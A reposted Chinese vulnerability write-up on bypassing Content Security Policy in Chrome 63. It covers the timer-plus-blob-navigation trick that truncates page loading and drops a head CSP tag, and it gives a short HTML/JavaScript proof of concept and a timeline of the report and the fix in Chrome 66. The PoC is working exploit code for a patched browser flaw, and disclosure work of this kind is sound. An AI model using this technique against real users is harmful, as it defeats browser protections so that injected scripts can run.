如何绕过Chrome 63.0版本的CSP

转自： n0tr00t

0x01 TL;DR

我观察到当 try catch 在计时器中使用 location 设置 blob scheme 时，网络请求加载会被随机阻断（页面完成加载但内容部分缺失，有趣的是内容缺失是从上到下的顺序），这个缺陷让我想到能够利用并优先吃掉 head 头中出现的 CSP 防御策略，这样声明的策略就会彻底失效，注入内容能够顺利执行。

比如这样：

<cut>

content...

<me ta http-equiv="Content-Security-Policy" content="sc ript-src 'self'; ob ject-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

</cut>

content...

here injection

截断 Google or Bing：

0x02 PoC

<html>
    <!-- author: evi1m0.bat[at]gmail.com -->
    <sc ript>
        pwn = () => {
            target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
            win = window.open(target, "emm", "width=500,height=400");

            setInterval(`try{
                    x = win.location.href;
                } catch(e) {
                    win.location.href = 'blob://';
                }`, 1);
        }
    </sc ript>

    <p>
      <a on click="pwn()" target="_blank">Click me bypass CSP</a>
      // If it doesn't work, again. :)
    </p>
</html>

0x03 Video

http://server.n0tr00t.com/chrome/cut_bypasscsp.mp4

0x04 Track

• Nov 9 2017: Reported by evi1m0.bat@gmail.com
• May 7 2018: Chrome fixed 66.0.3359.139
• https://bugs.chromium.org/p/chromium/issues/detail?id=783073#c_ts1525680141

来源：https://www.n0tr00t.com/2018/12/19/Chrome-63-0-CSP-Bypass.html